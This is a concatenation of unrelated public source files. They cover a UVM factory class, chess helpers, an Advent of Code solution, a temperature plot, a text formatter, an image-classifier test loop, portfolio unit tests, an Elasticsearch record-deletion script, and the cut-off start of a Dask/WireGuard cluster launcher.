0:\n qs.push_back(\" No instance or type overrides are registered with this factory\\n\")\n else:\n max1 = 0\n max2 = 0\n max3 = 0\n dash = \"-\" * 100\n space = \" \" * 100\n # print instance overrides\n if len(sorted_override_queues) == 0:\n qs.push_back(\"No instance overrides are registered with this factory\\n\")\n else:\n for key, qc in sorted_override_queues.items():\n for i in range(len(qc.queue)):\n orig_type_name = qc.queue[i].orig_type_name\n full_inst_path = qc.queue[i].full_inst_path\n ovrd_type_name = qc.queue[i].ovrd_type_name\n if len(orig_type_name) > max1:\n max1 = len(orig_type_name)\n if len(full_inst_path) > max2:\n max2 = len(full_inst_path)\n if len(ovrd_type_name) > max3:\n max3 = len(ovrd_type_name)\n\n if max1 < 14:\n max1 = 14\n if max2 < 13:\n max2 = 13\n if max3 < 13:\n max3 = 13\n\n qs.push_back(\"Instance Overrides:\\n\\n\")\n qs.push_back(sv.sformatf(\" %0s%0s %0s%0s %0s%0s\\n\",\"Requested Type\",\n space[1:max1-14], \"Override Path\", space[1:max2-13],\n \"Override Type\", space[1:max3-13]))\n qs.push_back(sv.sformatf(\" %0s %0s %0s\\n\",dash[1:max1],\n dash[1:max2], dash[1:max3]))\n\n for key, qc in sorted_override_queues.items():\n # qc = sorted_override_queues[j]\n for i in range(len(qc.queue)):\n qs.push_back(sv.sformatf(\" %0s%0s %0s%0s\",qc.queue[i].orig_type_name,\n space[1:max1-len(qc.queue[i].orig_type_name)],\n qc.queue[i].full_inst_path,\n space[1:max2-len(qc.queue[i].full_inst_path)]))\n qs.push_back(sv.sformatf(\" %0s\\n\", qc.queue[i].ovrd_type_name))\n\n # print type overrides\n if len(self.m_type_overrides) == 0:\n qs.push_back(\"\\nNo type overrides are registered with this factory\\n\")\n else:\n # Resize for type overrides\n if max1 < 14:\n max1 = 14\n if max2 < 13:\n max2 = 13\n if max3 < 13:\n max3 = 13\n\n for i in range(len(self.m_type_overrides)):\n if len(self.m_type_overrides[i].orig_type_name) > max1:\n max1 = len(self.m_type_overrides[i].orig_type_name)\n if len(self.m_type_overrides[i].ovrd_type_name) > max2:\n max2 = len(self.m_type_overrides[i].ovrd_type_name)\n if max1 < 14:\n max1 = 14\n if max2 < 13:\n max2 = 13\n qs.push_back(\"\\nType Overrides:\\n\\n\")\n qs.push_back(sv.sformatf(\" %0s%0s %0s%0s\\n\",\"Requested Type\", space[1:max1-14],\n \"Override Type\", space[1:max2-13]))\n qs.push_back(sv.sformatf(\" %0s %0s\\n\",dash[1:max1],\n dash[1:max2]))\n for index in range(len(self.m_type_overrides)):\n qs.push_back(sv.sformatf(\" %0s%0s %0s\\n\",\n self.m_type_overrides[index].orig_type_name,\n space[1:max1-len(self.m_type_overrides[index].orig_type_name)],\n self.m_type_overrides[index].ovrd_type_name))\n\n # print all registered types, if all_types >= 1\n if all_types >= 1 and self.m_type_names.has_first():\n banner = False\n qs.push_back(sv.sformatf(\"\\nAll types registered with the factory: %0d total\\n\",self.m_types.num()))\n key = self.m_type_names.first()\n while key is not None:\n # filter out uvm_ classes (if all_types<2) and non-types (lookup strings)\n if (not (all_types < 2 and uvm_is_match(\"uvm_*\",\n self.m_type_names[key].get_type_name())) and\n key == self.m_type_names[key].get_type_name()):\n if not banner:\n qs.push_back(\" Type Name\\n\")\n qs.push_back(\" ---------\\n\")\n banner = True\n qs.push_back(sv.sformatf(\" %s\\n\", self.m_type_names[key].get_type_name()))\n if self.m_type_names.has_next():\n key = self.m_type_names.next()\n else:\n break\n # end while(self.m_type_names.next(key))\n\n qs.push_back(\"(*) Types with no associated type name will be printed as \\n\\n####\\n\\n\")\n return UVM_STRING_QUEUE_STREAMING_PACK(qs)\n\n def print_factory(self, all_types=True):\n \"\"\"\n print\n -----\n Args:\n all_types:\n \"\"\"\n fact_str = self.convert2string(all_types)\n uvm_info(\"UVM/FACTORY/PRINT\", fact_str, UVM_NONE)\n\n # debug_create_by_name\n # TODO\n def debug_create_by_name(self, requested_type_name, parent_inst_path=\"\", name=\"\"):\n self.m_debug_create(requested_type_name, None, parent_inst_path, name)\n\n # debug_create_by_type\n\n def debug_create_by_type(self, requested_type, parent_inst_path=\"\", name=\"\"):\n self.m_debug_create(\"\", requested_type, parent_inst_path, name)\n\n # m_debug_create\n # TODO\n def m_debug_create(self, requested_type_name, requested_type,\n parent_inst_path, name):\n full_inst_path = self._get_inst_path(parent_inst_path, name)\n result = None\n self.m_override_info.clear()\n\n if requested_type is None:\n if (not self.m_type_names.exists(requested_type_name) and\n not self.m_lookup_strs.exists(requested_type_name)):\n uvm_report_warning(\"Factory Warning\", {\"The factory does not recognize '\",\n requested_type_name,\"' as a registered type.\"}, UVM_NONE)\n return\n UVMDefaultFactory.m_debug_pass = 1\n result = self.find_override_by_name(requested_type_name,full_inst_path)\n else:\n UVMDefaultFactory.m_debug_pass = 1\n if not self.m_types.exists(requested_type):\n self.register(requested_type)\n result = self.find_override_by_type(requested_type,full_inst_path)\n if requested_type_name == \"\":\n requested_type_name = requested_type.get_type_name()\n self.m_debug_display(requested_type_name, result, full_inst_path)\n UVMDefaultFactory.m_debug_pass = 0\n for obj in self.m_override_info:\n obj.selected = 0\n\n # m_debug_display\n # TODO\n def m_debug_display(self, requested_type_name, result, full_inst_path):\n pass\n max1 = 0\n max2 = 0\n max3 = 0\n dash = 100 * \"-\"\n space = 100 * \" \"\n qs = []\n\n qs.append(\"\\n#### Factory Override Information (*)\\n\\n\")\n qs.append(sv.sformatf(\"Given a request for an object of type '%s' with \"\n + \"an instance\\npath of '%s' the factory encountered\\n\\n\",\n requested_type_name,full_inst_path))\n\n if len(self.m_override_info) == 0:\n qs.append(\"no relevant overrides.\\n\\n\")\n else:\n qs.append(\"the following relevant overrides. \"\n + \"An 'x' next to a match indicates a\\nmatch that was ignored.\\n\\n\")\n\n for i in range(len(self.m_override_info)):\n if (len(self.m_override_info[i].orig_type_name) > max1):\n max1 = len(self.m_override_info[i].orig_type_name)\n if (len(self.m_override_info[i].full_inst_path) > max2):\n max2 = len(self.m_override_info[i].full_inst_path)\n if (len(self.m_override_info[i].ovrd_type_name) > max3):\n max3 = len(self.m_override_info[i].ovrd_type_name)\n\n if max1 < 13:\n max1 = 13\n if max2 < 13:\n max2 = 13\n if max3 < 13:\n max3 = 13\n\n qs.append(sv.sformatf(\"Original Type%0s Instance Path%0s Override Type%0s\\n\",\n space[1:max1-12],space[1:max2-12],space[1:max3-12]))\n #space.substr(1,max1-13),space.substr(1,max2-13),space.substr(1,max3-13)))\n\n qs.append(sv.sformatf(\" %0s %0s %0s\\n\",\n dash[1:max1], dash[1:max2], dash[1:max3]))\n\n for i in range(len(self.m_override_info)):\n orig_type_len = len(self.m_override_info[i].orig_type_name)\n full_inst_path_len = len(self.m_override_info[i].full_inst_path)\n ovrd_type_len = len(self.m_override_info[i].ovrd_type_name)\n is_sel_str = \"x \"\n if self.m_override_info[i].selected:\n is_sel_str = \" \"\n\n qs.append(sv.sformatf(\"%s%0s%0s\",\n is_sel_str,\n self.m_override_info[i].orig_type_name,\n space[1:max1-orig_type_len]))\n qs.append(sv.sformatf(\" %0s%0s\", self.m_override_info[i].full_inst_path,\n space[1:max2-full_inst_path_len]))\n qs.append(sv.sformatf(\" %0s%0s\", self.m_override_info[i].ovrd_type_name,\n space[1:max3-ovrd_type_len]))\n if self.m_override_info[i].full_inst_path == \"*\":\n qs.append(\" \")\n else:\n qs.append(\"\\n\")\n qs.append(\"\\n\")\n\n qs.append(\"Result:\\n\\n\")\n chosen_type_name = requested_type_name\n if result is not None:\n chosen_type_name = result.get_type_name()\n qs.append(sv.sformatf(\" The factory will produce an object of type '%0s'\\n\",\n chosen_type_name))\n\n qs.append(\"\\n(*) Types with no associated type name will be printed as \\n\\n####\\n\\n\")\n uvm_info(\"UVM/FACTORY/DUMP\", UVM_STRING_QUEUE_STREAMING_PACK(qs),UVM_NONE)\n\n # Internal helper functions\n\n def are_args_ok(self, qc_elem, requested_type, full_inst_path) -> bool:\n name_ok = (qc_elem.orig_type == requested_type or\n (qc_elem.orig_type_name != \"\" and\n qc_elem.orig_type_name != \"\" and\n qc_elem.orig_type_name == requested_type.get_type_name()))\n return name_ok and uvm_is_match(qc_elem.full_inst_path, full_inst_path)\n\n def args_are_ok_again(self, type_override, requested_type) -> bool:\n match_ok = (type_override.orig_type_name != \"\" and\n type_override.orig_type_name != \"\" and\n requested_type is not None and\n type_override.orig_type_name == requested_type.get_type_name())\n return type_override.orig_type == requested_type or match_ok\n\n\n\nclass UVMObjectWrapper:\n \"\"\"\n The UVMObjectWrapper provides an abstract interface for creating object and\n component proxies. Instances of these lightweight proxies, representing every\n `UVMObject`-based and `UVMComponent`-based object available in the test\n environment, are registered with the `UVMFactory`. When the factory is\n called upon to create an object or component, it finds and delegates the\n request to the appropriate proxy.\n \"\"\"\n\n def create_object(self, name=\"\"):\n \"\"\"\n Creates a new object with the optional `name`.\n An object proxy (e.g., ) implements this\n method to create an object of a specific type, T.\n\n Args:\n name (str):\n Returns:\n UVMObject|None\n \"\"\"\n return None\n\n def create_component(self, name, parent):\n \"\"\"\n Function: create_component\n\n Creates a new component, passing to its constructor the given `name` and\n `parent`. A component proxy (e.g. )\n implements this method to create a component of a specific type, T.\n\n Args:\n name (str):\n parent (UVMComponent): Parent of the created component.\n Returns:\n UVMComponent|None\n \"\"\"\n return None\n\n def get_type_name(self):\n \"\"\"\n Derived classes implement this method to return the type name of the object\n created by `create_component` or `create_object`. The factory uses this\n name when matching against the requested type in name-based lookups.\n\n Returns:\n str: Name of the type\n \"\"\"\n return \"\"\n\n# pytype: enable=attribute-error,not-writable\n","repo_name":"tpoikela/uvm-python","sub_path":"src/uvm/base/uvm_factory.py","file_name":"uvm_factory.py","file_ext":"py","file_size_in_byte":41731,"program_lang":"python","lang":"en","doc_type":"code","stars":205,"dataset":"github-code","pt":"60"} +{"seq_id":"75670573952","text":"import chess\n\n\nLIST_PIECE_VALUE = {\n \"P\": 10,\n \"N\": 30,\n \"B\": 30,\n \"R\": 50,\n \"Q\": 90,\n \"K\": 100,\n \"p\": -10,\n \"n\": -30,\n \"b\": -30,\n \"r\": -50,\n \"q\": -90,\n \"k\": -100\n}\n\n\n## ################################\n## PRINT 5x5 BOARD\n## ################################\ndef make5x5Board(fen: str, depth: int=0):\n pre_space = \" \" * 5 * depth\n list_board_5x5 = []\n list_board_5x5.append(fen)\n row_count = 5\n for row_8x8 in fen.split(\"/\")[3:]:\n row_5x5 = \"\"\n for piece in row_8x8:\n if piece == \" \": break\n elif piece in \"12345678\":\n row_5x5 += \"-- \" * int(piece)\n else:\n row_5x5 += \"w\" if (\"A\" < piece and piece < \"Z\") else \"b\"\n row_5x5 += f\"{piece.upper()} \"\n list_board_5x5.append(pre_space + row_5x5[ :3*5] + f\"| {row_count}\")\n row_count -= 1\n list_board_5x5.append(pre_space + \"---\" * 5)\n list_board_5x5.append(pre_space + \"A B C D E\")\n return list_board_5x5\n\ndef print5x5Board(board: chess.Board, depth: int=0):\n print(depth)\n print(\"\\n\".join( make5x5Board(board.fen(), depth) ))\n print(\" \")\n\n\n## ################################\n## COMPUTE FUNCTIONS\n## ################################\ndef checkGameOver(board: chess.Board):\n return (\n board.is_stalemate() or\n board.can_claim_threefold_repetition() or\n board.is_fivefold_repetition() or\n board.is_insufficient_material() or\n board.is_seventyfive_moves()\n )\n\ndef legal5x5Moves(board: chess.Board):\n return [\n move for move in board.legal_moves\n if (int(str(move)[-1]) < 6) and (str(move)[-2] < \"f\")\n ]\n\ndef getNextBoardStates(board: chess.Board):\n list_next_boards = []\n list_next_moves = legal5x5Moves(board)\n for move in list_next_moves:\n board.push(move)\n list_next_boards.append(board.copy())\n board.pop()\n return list_next_boards\n\n\n## END OF LIBRARY","repo_name":"AstroKriel/5x5Chess","sub_path":"MyLibrary/ChessFuncs.py","file_name":"ChessFuncs.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35017975001","text":"\nimport time\n\nfile = open('input.txt','r')\ndata = file.readlines()\nfile.close()\n\nfor index,item in enumerate(data):\n print(index,item.strip())\nexit(0)\n\nrow_count = []\n\naccumulator = 0\nprogramcounter = 0\n\nprogram_length = len(data)\n\nrunning = True\nwhile running:\n if programcounter not in row_count:\n row_count.append(programcounter)\n else:\n print(\"Final accumulator: \",accumulator)\n running = False\n line = data[programcounter].strip()\n command,parameter = line.split(' ')\n print(programcounter,accumulator,command,parameter)\n\n if command == 'acc':\n accumulator = accumulator + int(parameter)\n programcounter = programcounter + 1\n\n if command == 'nop':\n if programcounter+int(parameter) == program_length:\n print(\"This is the end!\",programcounter,line)\n exit(0)\n programcounter = programcounter + 1\n\n if command == 'jmp':\n if programcounter + 1 == program_length:\n print(\"This is the end!\",programcounter,line)\n exit(0)\n programcounter = programcounter + int(parameter)\n \n if programcounter >= program_length-1:\n print(\"Exit.\")\n exit(0)\n\n# time.sleep(5)\n","repo_name":"tehongis/adventofcode","sub_path":"2020/day08/day08-2.py","file_name":"day08-2.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29691874540","text":"#\n# August 2013 High Temps for Knoxville,TN\n#\n# Author: Terryl Dodson\n# NetID: tdodson3\n# Assignment #: Hwk 1 for COSC 370\n\n#importing libraries\nfrom prettytable import PrettyTable\nfrom numpy import arange\nimport numpy as np\nfrom tabulate import tabulate, _table_formats\nimport matplotlib.pyplot as plt\n\n#initializing arrays (xData - days in the month, tData - temperatures for each data,\n# avg - list that holds the average temperatures values, sum - variable to obtain the sum of temperatures,\n# num - obtains number of values)\nxData = arange(1,32) \ntData = [86,87,84,86,86,86,84,83,90,89,88,85,86,79,83,81, \\\n 75,80,81,85,81,88,89,87,84,85,86,88,88,90,90]\navg = [] \nsum = 0\nnum = 1\n\n#for loop to loop through temperature values \n#calculates the average values and stores each value in avg list\nfor i in tData:\n sum += i\n avg.append(sum / num)\n num += 1 \n\n#formatted average values to 2 decimal places\nformatted_avg_list = ['%.2f' % elem for elem in avg]\n\n#created table that displays the average for each day\ntable = PrettyTable(['Day', 'Avg'])\nfor x in range(0,31):\n table.add_row([xData[x], formatted_avg_list[x]])\nprint(table)\n \n#set title for the graph\nplt.title(\"High Temperatures for Knoxville, TN - August 2013\")\n\n#sets the x and y axes ranges\n#plots all three graphs (blue line, red circles, and green line)\n#set grid to be true\nplt.axis([0, 32, 70, 95])\nplt.plot(xData, tData, 'ro')\nplt.plot(xData, tData, 'b-')\nplt.plot(xData, avg, 'g--')\nplt.grid(linestyle = 'dashed')\nplt.grid(True)\n\n#set the text for the average line\nplt.text(15, 86, 'Monthly Avg', color='green', fontsize=12)\n\n#labeled the x and y axes\nplt.xlabel('Day')\nplt.ylabel('High Temp')\n\n#display graph\nplt.show()\n","repo_name":"zdunlap226/undergrad_classes","sub_path":"cs370 (Intro to Scientific Computing)/hw1/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10678058855","text":"from ..private.textformat import CommandLineParser\n\nfrom ..utils import czlogging, czoutline, cztext, czsystem\n\nimport io\nimport sys\n\n\ndef textFormat(text: str, action: str,\n align: str = 'l',\n lineWidth: int = 70,\n lvlWidth: int = 1,\n processComments: bool = False,\n printComments: bool = True,\n boldHeadings: bool = True\n ) -> str:\n \"\"\"\n Reformats given text and returns it as a string.\n\n :param text: input text.\n\n :param action: 'a', 'f' or 'o'\n If 'a', only aligns lines, preserving original\n line breaks.\n If 'f', fills lines, preserving paragraph\n breaks, and aligns them.\n If 'o', interprets input text as\n czoutline.Outliner markup and formats it\n accordingly.\n\n :param align: 'l' (left), 'r' (right) or 'c' (right).\n Ignored if 'action' is 'o'.\n\n :param lineWidth: Maximum line width. Must be > 9.\n Ignored if 'action' is 'a'.\n\n :param lvlWidth: Number of spaces per indentation level. Must be\n >= 0. Ignored if 'action' is not 'o'.\n\n :param processComments: If True, lines starting with '#' are regarded as\n comments. Ignored if 'action' is not 'o'.\n\n :param printComments: If True, comments are included in the output (as\n comments). Ignored if 'action' is not 'o'.\n\n :param boldHeadings: If True, uses bold styles for headings.\n Ignored if 'action' is not 'o'.\n\n :returns: a single string containing the formatted text\n\n :raises: ValueError\n \"\"\"\n if action == 'a':\n lines = text.splitlines()\n return '\\n'.join(cztext.align(lines, align, collapseSpaces=True))\n\n elif action == 'f':\n ans = []\n for par in cztext.paragraphy(text):\n ans.extend(cztext.fill(par, lineWidth=lineWidth))\n ans.append(\"\")\n #for\n if ans and ans[-1] == \"\":\n ans.pop(-1)\n #if\n return '\\n'.join(cztext.align(ans, align,\n tabWidth=0, # fill already handled tabs\n collapseSpaces=False # wrap already handled space clusters\n ))\n elif action == 'o':\n ans = io.StringIO()\n OL = czoutline.Outliner(stream=ans,\n lineWidth=lineWidth,\n lvlWidth=lvlWidth,\n processComments=processComments,\n printComments=printComments,\n h1Style=czoutline.Style.BOLD_YELLING if boldHeadings \\\n else czoutline.Style.YELLING,\n h2Style=czoutline.Style.BOLD_TITLE if boldHeadings \\\n else czoutline.Style.TITLE,\n h3Style=czoutline.Style.BOLD_TITLE if boldHeadings \\\n else czoutline.Style.TITLE,\n bulletStyle=czoutline.Style.BOLD if boldHeadings \\\n else czoutline.Style.NORMAL\n )\n OL << text\n return ans.getvalue()\n\n else:\n raise ValueError(\"'args.action' must be 'f' or 'p'\")\n #else\n\n#textFormat\n\n\ndef main():\n \"\"\"\n Main routine for command-line app 'textformat'.\n \"\"\"\n L = czlogging.LoggingChannel(czsystem.appName(),\n czlogging.LoggingLevel.WARNING)\n try:\n CLP = CommandLineParser()\n args = CLP.parseCommandLine()\n L.info(args)\n text = sys.stdin.read()\n ifExists = lambda _key : vars(args)[_key] if _key in vars(args) else None\n print(textFormat(text, args.action,\n align=ifExists('align'),\n lineWidth=ifExists('lineWidth'),\n lvlWidth=ifExists('lvlWidth'),\n processComments=ifExists('processComments'),\n printComments=ifExists('printComments'),\n boldHeadings=ifExists('boldHeadings')\n ))\n sys.exit(0)\n except AssertionError as e:\n raise e\n except Exception as e:\n L.error(e)\n sys.exit(2)\n #except\n#main\n\n\n### aczutro ###################################################################\n","repo_name":"aczutro/czutils","sub_path":"src/czutils/app/textformat.py","file_name":"textformat.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"26028062256","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nfrom torch.optim import lr_scheduler\r\nimport numpy as np\r\nimport torchvision\r\nfrom torchvision import datasets, models, transforms\r\nfrom torch.nn import functional as F\r\n\r\nimport os\r\nfrom utils.custom_dset import CustomDset\r\nfrom utils.common import logger\r\nimport json\r\nimport sys\r\nfrom sklearn import preprocessing\r\n\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\ndata_transforms = {\r\n 'test': transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\r\n ]),\r\n}\r\n\r\n\r\ndef test(model, classification, k=0, K=10, types=0, clinical=False, test_from_my_file=False, clinical_json_address=\"./clinical.json\", test_data_file=\"/database_c2/test.csv\"):\r\n model.eval()\r\n\r\n if clinical:\r\n with open(clinical_json_address, encoding='utf-8') as f:\r\n json_dict = json.load(f)\r\n peoples = [i for i in json_dict]\r\n features = np.array([json_dict[i] for i in json_dict], dtype=np.float32)\r\n min_max_scaler = preprocessing.MinMaxScaler()\r\n clinical_features = min_max_scaler.fit_transform(features)\r\n \r\n if test_from_my_file:\r\n print(\"in test_from_my_file == True\")\r\n testset = CustomDset(test_data_file, data_transforms['test'])\r\n\r\n elif classification != 2:\r\n testset = CustomDset(os.getcwd()+f'/database_c{classification}/test_ovr_{types}_fold_{k}.csv', data_transforms['test'])\r\n else:\r\n testset = CustomDset(os.getcwd()+f'/database_c2/test_{k}.csv', data_transforms['test'])\r\n print(\"==================================test_from_my_file:\",test_from_my_file)\r\n print(\"test_data_file:\",test_data_file)\r\n print(\"os.getcwd:\",os.getcwd())\r\n\r\n testloader = torch.utils.data.DataLoader(testset, batch_size=32,\r\n shuffle=False, num_workers=4)\r\n\r\n person_prob_dict = dict()\r\n ##\r\n all_result_address = test_data_file + \"_\" + str(k) + \".all_result.csv\"\r\n all_result_person_address = test_data_file + \"_\" + str(k) + \".all_result_person.csv\"\r\n if os.path.exists(all_result_address): # 如果文件存在\r\n # 删除文件,可使用以下两种方法。\r\n os.remove(all_result_address)\r\n #os.unlink(path)\r\n if os.path.exists(all_result_person_address): # 如果文件存在\r\n # 删除文件,可使用以下两种方法。\r\n os.remove(all_result_person_address)\r\n #os.unlink(path)\r\n file_handle=open(all_result_address,mode='a')\r\n file_person_handle=open(all_result_person_address,mode='a')\r\n item_count = 0\r\n all_result_item = \" \\n\"\r\n all_result_item_person= \"\"\r\n with torch.no_grad():\r\n for data in testloader:\r\n images, labels, names, images_names = data\r\n if clinical:\r\n X_train_minmax = [clinical_features[peoples.index(i)] for i in names]\r\n outputs = model(images.to(device), torch.from_numpy(np.array(X_train_minmax, dtype=np.float32)).to(device))\r\n else:\r\n outputs = model(images.to(device))\r\n probability = F.softmax(outputs, dim=1).data.squeeze()\r\n probs = probability.cpu().numpy()\r\n #print(\"++++++++++++++++++++++++++probs:\",probs)\r\n #print(\"end\")\r\n for i in range(labels.size(0)):\r\n p = names[i]\r\n if p not in person_prob_dict.keys():\r\n person_prob_dict[p] = {\r\n 'prob_0': 0, \r\n 'prob_1': 0,\r\n 'label': labels[i].item(),\r\n 'img_num': 0}\r\n if probs.ndim == 2:\r\n person_prob_dict[p]['prob_0'] += probs[i, 0]\r\n person_prob_dict[p]['prob_1'] += probs[i, 1]\r\n person_prob_dict[p]['img_num'] += 1\r\n else:\r\n person_prob_dict[p]['prob_0'] += probs[0]\r\n person_prob_dict[p]['prob_1'] += probs[1]\r\n person_prob_dict[p]['img_num'] += 1\r\n try:\r\n all_result_item = names[i] + \",\" + images_names[i] + \",\" + str(labels[i].item()) + \",\"+ str(probs[i,1])\r\n except:\r\n print(\"In cecept\")\r\n pass\r\n item_count = item_count + 1\r\n #all_result_item = names[i] + \" \" + str(labels[i].item()) + \" \"+ str(probs[i,1])\r\n #print(names[i].item(), \" \",images_names[i].item(), \" \",labels[i].item(), \" \", probs[i,1])\r\n #print(str(item_count),\" ====item:\",all_result_item)\r\n file_handle.write(all_result_item + '\\n')\r\n #print(\"++++++++++++++++++++++++++person_prob_dict:\",person_prob_dict)\r\n file_handle.close()\r\n label_list = []\r\n score_list = []\r\n for key in person_prob_dict:\r\n score = [\r\n person_prob_dict[key]['prob_0']/person_prob_dict[key]['img_num'],\r\n person_prob_dict[key]['prob_1']/person_prob_dict[key]['img_num'],\r\n ]\r\n score_list.append(score)\r\n label_list.append(person_prob_dict[key]['label'])\r\n all_result_item_person = str(key) + \",\" + str(person_prob_dict[key]['prob_1']/person_prob_dict[key]['img_num']) + \",\" + str(person_prob_dict[key]['label'])\r\n file_person_handle.write(all_result_item_person + '\\n')\r\n file_person_handle.close()\r\n logger.info(\"0 class people number is {}, 1 class people number is {}, proportion is {}\".format(\r\n label_list.count(0), label_list.count(1), label_list.count(0)/label_list.count(1)))\r\n\r\n total = len(person_prob_dict)\r\n correct = 0\r\n for key in person_prob_dict.keys():\r\n predict = 0\r\n if person_prob_dict[key]['prob_0'] < person_prob_dict[key]['prob_1']:\r\n predict = 1\r\n if person_prob_dict[key]['label'] == predict:\r\n correct += 1\r\n logger.info('Accuracy of the network on test images: %d %%' % (\r\n 100 * correct / total))\r\n\r\n return label_list, score_list\r\n","repo_name":"bensteven2/HE_breast_recurrence","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"24901700168","text":"import unittest\n\nfrom utilities import StockDataReader, DataHandler\nfrom portfolio import Portfolio\n\n\nclass TestApi(unittest.TestCase):\n\tdef test_get(self):\n\t\t\"\"\"\n\t\tStandard API testing, returning correct status code and data structures.\n\t\t\"\"\"\n\t\tresult = StockDataReader.get_data(\"IBM\")\n\t\tself.assertEqual(result.status_code, 200, msg=f\"Status code was {result.status_code} not 200.\")\n\n\t\tresult = StockDataReader.get_data(\"IBM\")\n\t\tif \"Error Message\" in result.json():\n\t\t\tself.assertTrue(result.json()['Meta Data'], True)\n\n\tdef test_last_price(self):\n\t\t\"\"\"\n\t\tTesting that the last price of an individual stock gets returned.\n\t\t\"\"\"\n\t\tresult = StockDataReader.last_price(StockDataReader.get_data(\"IBM\"))\n\t\tself.assertIsInstance(result, float)\n\n\tdef test_portfolio(self):\n\t\t\"\"\"\n\t\tTesting portfolio creation. initialisation and add stock.\n\t\t\"\"\"\n\t\tif DataHandler.check_portfolio_exists():\n\t\t\tresult = Portfolio()\n\t\t\tself.assertIsInstance(result.portfolio, dict)\n\t\telse:\n\t\t\tresult = Portfolio()\n\t\t\tresult.add_stock(\"AA\", 10, 50, \"2010-04-03\")\n\t\t\tself.assertTrue(result.portfolio['AA'], True)\n\n\n\tdef test_delete(self):\n\t\t\"\"\"\n\t\tTesting deletion of stock.\n\t\t\"\"\"\n\t\tresult = Portfolio()\n\t\tresult.add_stock(\"AA\", 10, 50, \"2010-04-03\")\n\t\tself.assertTrue(result.delete_stock(\"AA\"), True)\n\n\tdef test_verification(self):\n\t\t\"\"\"\n\t\tTesting verification method\n\t\t\"\"\"\n\t\t# Passing correct data\n\t\tresult = DataHandler.validate_entry('IBM', '2020-03-03', 45, 60.5, 112.8)\n\t\tself.assertTrue(result, True)\n\n\t\t# Passing invalid price data\n\t\tresult = DataHandler.validate_entry('IBM', '2020-03-03', 45, 'ff', 'error')\n\t\tself.assertEqual(result, \"Please enter a valid symbol.\")\n\n\t\t# Passing invalid symbol data\n\t\tresult = DataHandler.validate_entry(45, '2020-03-03', 45, 60.5, 112.8)\n\t\tself.assertEqual(result, \"Symbol must be string.\")\n\n\t\t# Passing invalid date data\n\t\tresult = DataHandler.validate_entry('IBM', '2020-25-03', 45, 60.5, 112.8)\n\t\tself.assertEqual(result, \"Date format: YYYY-MM-DD and must not be a future date.\")\n\n\t\t# Passing invalid amount data\n\t\tresult = DataHandler.validate_entry('IBM', '2020-03-03', '45f', 60.5, 112.8)\n\t\tself.assertEqual(result, \"Number of shares must be a number: '45'.\")\n\n\t\t# Passing invalid price data\n\t\tresult = DataHandler.validate_entry('IBM', '2020-03-03', 45, 'ff', 112.8)\n\t\tself.assertEqual(result, \"Price must be a number: '45.5'.\")\n","repo_name":"petelah/Stock-Portfolio-Tracker","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"30023863502","text":"from elasticsearch import Elasticsearch\nes = Elasticsearch([\"http://130.203.139.160:9200/\"], verify_certs=True)\n\npaperid = '79fd80bcfacc56113099d79440f9dd697ad53b3b'\nindexname = 'csx_citeseer_docs_old_pubinfo'\n\nif not es.ping():\n raise ValueError(\"Connection failed\")\nelse:\n print(\"Connection Established !\")\n\nes.delete_by_query(index=indexname, body={\n \"query\": {\n \"match\": {\n \"paper_id\": paperid\n }\n }\n})\n","repo_name":"SeerLabs/pdfmef","sub_path":"script/delete_papers.py","file_name":"delete_papers.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"60"} +{"seq_id":"5632154008","text":"import pandas as pd\nimport seaborn as sns\nimport numpy as np\nfrom TMDB.Modules.Helpers.LabelEncoding import label_encode\nimport matplotlib.pyplot as plt\n\n\ndef correlation_table(data: pd.DataFrame, path: str=None) -> None:\n data = label_encode(data)\n corr = data.corr()\n\n # Generate a mask for the upper triangle\n mask = np.zeros_like(corr, dtype=np.bool)\n mask[np.triu_indices_from(mask)] = True\n\n # Generate a custom diverging colormap\n cmap = sns.diverging_palette(220, 10, as_cmap=True)\n\n # Draw the heatmap with the mask and correct aspect ratio\n pic = sns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0, square=True, linewidths=.5, cbar_kws={\"shrink\": .5})\n if path:\n figure = pic.get_figure()\n figure.subplots_adjust(bottom=0.35, top=1)\n figure.savefig(path, dpi=600)\n plt.show()\n","repo_name":"Dominioncher/TMDB","sub_path":"TMDB/Modules/Statistic/Correlations.py","file_name":"Correlations.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71574570431","text":"#!/usr/bin/env python3\n\n\"\"\"\nscript to start a dask scheduler and wireguard gateway\nconnect to remote clouds and spawn gateways and workers there, connecting back\nto the scheduler and to each other\n\nthe VPN comes up with a standard config, including a\nhard coded, universal IP for the scheduler within the wireguard network\nDASK_MESH_NETWORK = \"fda5:c0ff:eeee:{site_id}::{local address}\"\n - site id 0 = scheduler\n - local address: 1 = router, 11+ = worker id on that site\n\"\"\"\n\nimport argparse\nimport collections\nimport subprocess\nimport random\nimport string\nimport sys\nimport textwrap\nimport time\n\n\n# this is a template of the docker compose file we'll create on any machine we ssh to, in order to spawn workers\nSITE_COMPOSE_TEMPLATE = \"\"\"\n# Dask router and workers compose file\nversion: \"3\"\n\n# network for communication between workers and worker-router\nnetworks:\n dask-cluster:\n# name: 